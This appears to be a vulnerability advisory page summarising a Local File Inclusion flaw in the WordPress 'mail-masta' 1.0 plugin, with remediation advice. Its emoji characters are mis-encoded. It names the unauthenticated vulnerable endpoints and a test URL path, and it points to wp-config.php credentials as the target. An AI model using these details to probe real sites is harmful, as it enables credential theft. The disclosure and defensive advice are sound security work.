This is a summary of the AI-generated 10-question deep analysis. The full version (longer answers, follow-up Q&A, related CVEs) requires login. Read the full analysis β
Q1What is this vulnerability? (Essence + Consequences)
π¨ **Essence**: A critical Input Validation Error in the WordPress 'mail-masta' plugin. π **Consequences**: Allows Local File Inclusion (LFI).β¦
π **Root Cause**: CWE-20 (Improper Input Validation). The plugin fails to sanitize user-supplied input in specific PHP files (`count_of_send.php` and `csvexport.php`).β¦
π₯ **Affected**: WordPress sites using the **mail-masta** plugin. Specifically **Version 1.0**. π¦ **Component**: The plugin itself is the weak link, not the core WordPress engine. Check your plugin list immediately! π΅οΈββοΈ
Q4What can hackers do? (Privileges/Data)
π **Attacker Capabilities**: Can read arbitrary local files. π **Key Target**: `wp-config.php` (contains DB credentials).β¦
β‘ **Threshold**: LOW. No authentication required for exploitation. πͺ **Access**: Publicly accessible endpoints (`count_of_send.php`, `csvexport.php`) can be targeted directly via HTTP requests.β¦
π **Public Exploits**: YES. Multiple PoCs exist on GitHub (e.g., by p0dalirius, Hackhoven). π οΈ **Tools**: Automated scanners like ProjectDiscovery Nuclei also have templates.β¦
π **Self-Check**: 1. Scan for `mail-masta` plugin version 1.0. 2. Test URLs: `http://target/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php`. 3. Look for file content in response.β¦
π‘οΈ **Workaround**: 1. **Disable/Uninstall** the plugin immediately if not essential. π« 2. If must keep, restrict access to `count_of_send.php` and `csvexport.php` via `.htaccess` or WAF rules. 𧱠3.β¦
π¨ **Urgency**: HIGH. Since it requires no auth and has public exploits, it is actively abused. πββοΈ **Priority**: Patch or remove immediately. Do not wait. The risk of credential theft is immediate and severe. β³